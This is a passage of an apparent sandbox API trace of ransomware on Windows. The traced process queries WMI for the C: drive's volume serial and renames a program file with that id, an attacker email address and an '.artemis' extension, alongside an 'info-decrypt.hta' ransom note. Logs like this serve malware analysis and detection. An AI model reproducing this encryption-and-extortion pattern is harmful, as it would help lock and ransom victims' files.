riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcecf4 | out: ppvObject=0x6bcecf4*=0x0) returned 0x80004002 [0200.454] IUnknown:Release (This=0x72015c) returned 0x1 [0200.455] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce660 | out: ppv=0x6bce660*=0x6736f08) returned 0x0 [0200.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce878 | out: ppvObject=0x6bce878*=0x0) returned 0x80004002 [0200.455] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce88c | out: ppvObject=0x6bce88c*=0x6738620) returned 0x0 [0200.455] WbemDefPath:IUnknown:Release (This=0x6736f08) returned 0x0 [0200.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4ac | out: ppvObject=0x6bce4ac*=0x6738620) returned 0x0 [0200.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce468 | out: ppvObject=0x6bce468*=0x0) returned 0x80004002 [0200.455] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0200.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcddc4 | out: ppvObject=0x6bcddc4*=0x0) returned 0x80004002 [0200.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdd74 | out: ppvObject=0x6bcdd74*=0x0) returned 0x80004002 [0200.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdd80 | out: ppvObject=0x6bcdd80*=0x77c0e8) returned 0x0 [0200.455] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c0e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdd88 | out: pCid=0x6bcdd88*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.456] WbemDefPath:IUnknown:Release (This=0x77c0e8) returned 0x3 [0200.456] CoGetContextToken (in: pToken=0x6bcdde0 | out: pToken=0x6bcdde0) returned 0x0 [0200.456] CoGetContextToken (in: pToken=0x6bcdd90 | out: pToken=0x6bcdd90) returned 0x0 [0200.456] CoGetContextToken (in: pToken=0x6bce1e8 | out: pToken=0x6bce1e8) returned 0x0 [0200.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce278 | out: ppvObject=0x6bce278*=0x0) returned 0x80004002 [0200.456] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0200.456] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0200.456] CoGetContextToken (in: pToken=0x6bceb70 | out: pToken=0x6bceb70) returned 0x0 [0200.456] CoGetContextToken (in: pToken=0x6bcead0 | out: pToken=0x6bcead0) returned 0x0 [0200.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x6bceba0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bceb9c | out: ppvObject=0x6bceb9c*=0x6738620) returned 0x0 [0200.456] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0200.456] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0200.456] WbemDefPath:IWbemPath:SetText (This=0x6738620, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0200.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6bced20 | out: puCount=0x6bced20*=0x2) returned 0x0 [0200.456] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6bced1c*=0x0, pszText=0x0 | out: puBuffLength=0x6bced1c*=0xf, pszText=0x0) returned 0x0 [0200.456] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6bced1c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced1c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.456] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced20 | out: ppv=0x6bced20*=0x72015c) returned 0x0 [0200.456] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced18 | out: pAptType=0x6bced18*=1) returned 0x0 [0200.456] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced1c | out: ppvObject=0x6bced1c*=0x0) returned 0x80004002 [0200.457] IUnknown:Release (This=0x72015c) returned 0x1 [0200.457] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce940 | out: ppv=0x6bce940*=0x673d360) returned 0x0 [0200.457] WbemLocator:IUnknown:QueryInterface (in: This=0x673d360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bceb58 | out: ppvObject=0x6bceb58*=0x0) returned 0x80004002 [0200.457] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb6c | out: ppvObject=0x6bceb6c*=0x6736f38) returned 0x0 [0200.457] WbemLocator:IUnknown:Release (This=0x673d360) returned 0x0 [0200.457] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce78c | out: ppvObject=0x6bce78c*=0x6736f38) returned 0x0 [0200.457] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce748 | out: ppvObject=0x6bce748*=0x0) returned 0x80004002 [0200.458] WbemLocator:IUnknown:AddRef (This=0x6736f38) returned 0x3 [0200.458] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0a4 | out: ppvObject=0x6bce0a4*=0x0) returned 0x80004002 [0200.458] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce054 | out: ppvObject=0x6bce054*=0x0) returned 0x80004002 [0200.458] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce060 | out: ppvObject=0x6bce060*=0x0) returned 0x80004002 [0200.458] CoGetContextToken (in: pToken=0x6bce0c0 | out: pToken=0x6bce0c0) returned 0x0 [0200.458] CoGetContextToken (in: pToken=0x6bce070 | out: pToken=0x6bce070) returned 0x0 [0200.458] CoGetContextToken (in: pToken=0x6bce4c8 | out: pToken=0x6bce4c8) returned 0x0 [0200.458] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce558 | out: ppvObject=0x6bce558*=0x0) returned 0x80004002 [0200.458] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x2 [0200.458] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x1 [0200.458] CoGetContextToken (in: pToken=0x6bceb38 | out: pToken=0x6bceb38) returned 0x0 [0200.458] CoGetContextToken (in: pToken=0x6bcea98 | out: pToken=0x6bcea98) returned 0x0 [0200.458] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x6bceb68*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bceb64 | out: ppvObject=0x6bceb64*=0x6736f38) returned 0x0 [0200.458] WbemLocator:IUnknown:AddRef (This=0x6736f38) returned 0x3 [0200.458] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x2 [0200.458] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6bcecfc | out: puCount=0x6bcecfc*=0x2) returned 0x0 [0200.458] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x6bcecf8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcecf8*=0xf, pszText=0x0) returned 0x0 [0200.458] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x6bcecf8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcecf8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.458] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcebd4 | out: ppv=0x6bcebd4*=0x6737088) returned 0x0 [0200.458] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737088, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bcec68 | out: ppNamespace=0x6bcec68*=0x674815c) returned 0x0 [0201.284] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb04 | out: ppvObject=0x6bceb04*=0x781ae4) returned 0x0 [0201.284] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781ae4, pProxy=0x674815c, pAuthnSvc=0x6bceb54, pAuthzSvc=0x6bceb50, pServerPrincName=0x6bceb48, pAuthnLevel=0x6bceb4c, pImpLevel=0x6bceb3c, pAuthInfo=0x6bceb40, pCapabilites=0x6bceb44 | out: pAuthnSvc=0x6bceb54*=0xa, pAuthzSvc=0x6bceb50*=0x0, pServerPrincName=0x6bceb48, pAuthnLevel=0x6bceb4c*=0x6, pImpLevel=0x6bceb3c*=0x2, pAuthInfo=0x6bceb40, pCapabilites=0x6bceb44*=0x1) returned 0x0 [0201.284] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x1 [0201.284] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceaf8 | out: ppvObject=0x6bceaf8*=0x781b04) returned 0x0 [0201.284] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceaf4 | out: ppvObject=0x6bceaf4*=0x781ae4) returned 0x0 [0201.284] WbemLocator:IClientSecurity:SetBlanket (This=0x781ae4, pProxy=0x674815c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0201.284] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x2 [0201.284] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0201.284] CoTaskMemFree (pv=0x77dde8) [0201.284] WbemLocator:IUnknown:Release (This=0x6737088) returned 0x0 [0201.284] WbemLocator:IUnknown:QueryInterface (in: This=0x674815c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce6f4 | out: ppvObject=0x6bce6f4*=0x781b04) returned 0x0 [0201.285] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce6b0 | out: ppvObject=0x6bce6b0*=0x0) returned 0x80004002 [0201.286] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce4cc | out: ppvObject=0x6bce4cc*=0x0) returned 0x80004002 [0201.288] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0201.288] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce00c | out: ppvObject=0x6bce00c*=0x0) returned 0x80004002 [0201.292] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdfbc | out: ppvObject=0x6bcdfbc*=0x0) returned 0x80004002 [0201.454] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcdfc8 | out: ppvObject=0x6bcdfc8*=0x781a64) returned 0x0 [0201.455] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781a64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdfd0 | out: pCid=0x6bcdfd0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.455] WbemLocator:IUnknown:Release (This=0x781a64) returned 0x3 [0201.455] CoGetContextToken (in: pToken=0x6bce028 | out: pToken=0x6bce028) returned 0x0 [0201.455] CoGetContextToken (in: pToken=0x6bce430 | out: pToken=0x6bce430) returned 0x0 [0201.455] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce4c0 | out: ppvObject=0x6bce4c0*=0x781aec) returned 0x0 [0201.455] WbemLocator:IRpcOptions:Query (in: This=0x781aec, pPrx=0x781b04, dwProperty=2, pdwValue=0x6bce4e8 | out: pdwValue=0x6bce4e8) returned 0x80004002 [0201.455] WbemLocator:IUnknown:Release (This=0x781aec) returned 0x3 [0201.455] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0201.455] CoGetContextToken (in: pToken=0x6bcea08 | out: pToken=0x6bcea08) returned 0x0 [0201.455] CoGetContextToken (in: pToken=0x6bce968 | out: pToken=0x6bce968) returned 0x0 [0201.455] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x6bcea38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bcea34 | out: ppvObject=0x6bcea34*=0x674815c) returned 0x0 [0201.456] WbemLocator:IUnknown:AddRef (This=0x674815c) returned 0x4 [0201.456] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x3 [0201.456] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x2 [0201.456] SysStringLen (param_1=0x0) returned 0x0 [0201.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6bcedcc | out: puCount=0x6bcedcc*=0x0) returned 0x0 [0201.456] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6bcedc8*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedc8*=0x20, pszText=0x0) returned 0x0 [0201.456] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6bcedc8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedc8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.456] CoGetContextToken (in: pToken=0x6bcea38 | out: pToken=0x6bcea38) returned 0x0 [0201.456] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0201.456] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce8cc | out: ppvObject=0x6bce8cc*=0x781b04) returned 0x0 [0201.456] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x3 [0201.456] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0201.456] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6bcedd0*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd0*=0x20, pszText=0x0) returned 0x0 [0201.456] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6bcedd0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcedd0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.456] IWbemServices:GetObject (in: This=0x674815c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bced84*=0x0, ppCallResult=0x0 | out: ppObject=0x6bced84*=0x673b468, ppCallResult=0x0) returned 0x0 [0202.069] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6bced84 | out: puCount=0x6bced84*=0x2) returned 0x0 [0202.069] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6bced80*=0x0, pszText=0x0 | out: puBuffLength=0x6bced80*=0xf, pszText=0x0) returned 0x0 [0202.069] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6bced80*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced80*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.069] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bced80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x341b09c*=0, plFlavor=0x341b0a0*=0 | out: pVal=0x6bced80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x341b09c*=8, plFlavor=0x341b0a0*=0) returned 0x0 [0202.069] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.069] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.069] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bced88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x341b09c*=8, plFlavor=0x341b0a0*=0 | out: pVal=0x6bced88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x341b09c*=8, plFlavor=0x341b0a0*=0) returned 0x0 [0202.069] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.069] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6bce988, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0202.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6bce988, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x65 [0202.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcede8) returned 1 [0202.070] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), fInfoLevelId=0x0, lpFileInformation=0x6bcee64 | out: lpFileInformation=0x6bcee64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1f072c00, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0xf2da0)) returned 1 [0202.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcede4) returned 1 [0202.070] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0202.070] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6bcea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0202.070] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6bcea24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0202.070] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bcea2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", lpFilePart=0x0) returned 0x42 [0202.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee8c) returned 1 [0202.071] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bcef08 | out: lpFileInformation=0x6bcef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b0c5f80, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x1b0c5f80, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x1b0c5f80, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 